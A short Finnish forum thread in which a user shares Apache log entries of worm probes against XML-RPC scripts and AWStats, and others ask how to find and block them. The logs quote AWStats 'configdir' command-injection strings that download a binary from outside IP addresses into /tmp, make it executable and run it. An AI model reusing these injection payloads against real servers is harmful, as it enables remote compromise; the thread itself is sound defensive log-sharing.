Eilen uutisoitiin kesäkuussa löydetystä tietoturva aukosta xml-rpc rajapinnassa. Heti näkyy logissa hyökkäyksiä tuota aukkoa vasten: Logista: /xmlrpc.php /xmlrpc/xmlrpc.php /phpgroupware/xmlrpc.php /blog/xmlrpc.php /xmlsrv/xmlrpc.php /blogs/xmlsrv/xmlrpc.php /blog/xmlsrv/xmlrpc.php /wordpress/xmlrpc.php /drupal/xmlrpc.php Sekä siihen liittyvät: /scgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 62.101.193.244/lupii;chmod +x lup... /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 62.101.193.244/lupii;chmod +x lupi... Ja vielä uudemmat viimeyöltä jossa [bold]lupii[/bold] niminen tiedosto on muuttunut [bold]listen[/bold] nimiseksi. /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x list... /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./lis... /cgi-bin/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./lis...
Ei aiheeseen löytynyt mitään linkkejä? Missäs siellä lokitiedostoissa nuo mahdollisesti löytyvät ja onkos tuohon keksitty joku vastakeino? Tietty portti umpeen tjsp?
Siis sorry peloittelusta, noihan on siis Apachen lokissa. Mato ei koske tavallista käyttäjää! Noi oli mun omasta apache logista 404 sivut.. Tuossa it-viikon uutinen, joka olikin jo toissapv. http://it-viikko.fi/uutiset/uutisalue.asp?alue=viikko&UutisID=71067 Aamulla ennen aamukahvia kirjoitin tuon aloituksen..